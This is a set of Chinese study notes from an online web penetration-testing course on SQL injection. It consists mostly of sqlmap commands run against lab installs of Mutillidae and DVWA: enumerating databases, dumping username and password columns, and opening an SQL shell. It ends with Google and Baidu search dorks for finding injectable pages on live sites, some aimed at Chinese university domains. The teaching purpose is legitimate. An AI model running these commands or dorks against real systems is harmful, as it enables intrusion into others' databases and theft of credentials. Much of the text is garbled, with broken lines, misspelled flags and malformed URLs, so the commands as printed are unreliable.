开发者学堂课程【网络安全攻防 - Web渗透测试:SQL 注入攻击_7】学习笔记,与课程紧密联系,让用户快速学习知识。
课程地址:https://developer.aliyun.com/learning/course/630/detail/9910
SQL 注入攻击_7
内容介绍
一、 GET 方法注入
二、 POST 方法注入
三、 数据获取
四、 提权操作
五、 综合实例
一、 GET 方法注入
1. //获取所有数据库
rootekali:~#sqlmap-u "http://192.168.106.134/mutillidae/index.php?page=user-
info.php&username-yangge&password-1238user-info-php-submit-button-=View+Account+Details"-dbs
2. //获得所有用户
root@kali:~#sqlmap-u
“
http://192.168.106.134/mutillidae/index.php?page=user-
info.php&username-yangge&password-123&user-info-php-submit-button=View+Account+Details”--us
3. //获得当前用户
root@kali:-# sqlmap -u "http://192.168.106.134/mutillidae/index .php?page=user-info.php&username=yangge&password-123&user-info-php-submit-button=View-Account+Details
”current-user
4. sqlmap 参数解析
--users
--current-user
--dbs
--current -db
-D "database_name" --tables
-D “database_name"-T "table_name”--columns
--dump-all
--dump-all --exclude-sysdbs
-D “database name"-T "table_name"--dump
-D "database name"--tables
-D “database_name"-T "table_name"--columns
--batch
//自动化完成
5. 示例步骤:
1) 获得当前数据库
root@kali:# sqlmap -u “
http://192.168.106.134/mutillidae/index.php?page=use-info.php?username=yangge&password=1238user-info-php-submit-button=
View+Account+Details”\--batch--current-db
2) 获得数据库表
root@kali:~# sqlmap -u “
http://192.168.106.134/mutillidae/index
php?page-user-info.php&username=yangge&password=123&user-info-php-submit-button=View+Account +Details”\--batch -D nowasp --tables
1) 获得表的字段
root@kali:~# sqlmap -u
”
http://192.168
1
34/mutillidae/index.php?page-user-info.php&username=eee&password info-php-submit-button=View+Account+Detalls
”
--batch -D nowasp -T accounts --columns
2) 获得表中的数据
root@kali:~# sqlmap -u"http://192.168.166.134/mut1llidae/index.php?page-user-info.php&username-eee&password=eee&user-info-php-submit-button=View+Account+Details--batch -D nowasp -T accounts -C "username, password" --dump
二、 POST 方法注入
1. 需要带 cookie 才能访问的注入页面,--cookie=””
root@kali:~# sqlmap -u
http://192.168.106.134/dvwa/vulnerabilities/sqli/?id=18Submit=Submit#
\--cookie-
“PHPSESSID-10jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \
acopendivids-swingset,jotto,phpbb2,rednine;acgroupswithpersist-nada"--batc
h
2. root@kali:~# sqlmap -u“
http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#
”\--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -p id
1. root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch --users
2. root@kali:~# sqlmap -u“
http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie="PHPSESSID-i0jcqf4uhd68qujcof3n322e95;securitylow;showhints=1;
\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada"--batch --current-user
三、 数据获取
1. --users
--current -user
--dbs
--current-db
-D
“database_name”--tables
-D
“database name” -T "table name"--columns
--dump-all
--dump-all --exclude-sysdbs
-D "database_name"-T "table_name”-C"usernane, password”--dump
2. root@kali
:~# sqlmap -u
showhints=1;acopendivids=swingset,jotto,phpbb2,redmine;acgro thpersist-nada” --batchusers
3. root@kali:~# sqlmap -u "http://92.168.106.134/6
ea ilities/sqli/?id-18Submit-Submit#
”--cookie="PHPSESSID=10jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada”-- batch --current-db
4. root@kali:~# sqlmap
-u"httpi//192.168.106.134/dvwa/vulnerabilities/sq11/?id=18Submit-Submit#
”-cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D
“dvwa”--tables
5. root@kali:~# sqlmap
-u"http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-1&Submit-Submit#"cookie="PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-1ow;showhint5-1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D "dvwa"-T"users”--columns
6. root@kali:~# sqlmap -u
"http://192.168.106.134/dvwa/vulnerabilities/sq11/?1d-185ubmit-Submdtcookie-"PHPSESSID-10jcqf4uhd68qujcof3n322e95;security-low; showhints
acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D "dvwa" -T users" -C "username,password"--dump
7. root@kali:~# sqlmap -u
“
http://192.168.106.134/dvwa/vulnerabilities/sq1i/?1d-185ubmit=Submit#
”-cookie=”PHPSESSID=i0jcqf4uhd68qujcof3n322e95;secunitv=low:showhints=1;\
acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D”dvwa” -T “users"--dump
四、 提权操作
//与数据库交互--sql-shell
rootfkali:~# sqlmap -u
http://192.168.106.134/dvwa/vuinerabilities/sqli/?id=1&Submit=Submit#
-cookie="PHPSES5ID=i0jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --batch --sql--shell
五、 综合实例
1. 通过 Google 搜索可能存在注入的页面
inurl:.php?id
inurl:.jsp?id
inurl:.asp?id=
inurl:/admin/login.php
inurl:.php?id- intitle:
美女
2. 通过百度搜索可能存在注入的页面
inurl:news.asp?id= site:edu.cn
inurl:news.php?id= site;edu.cn
inurl:news.aspx?id= site;edu.cn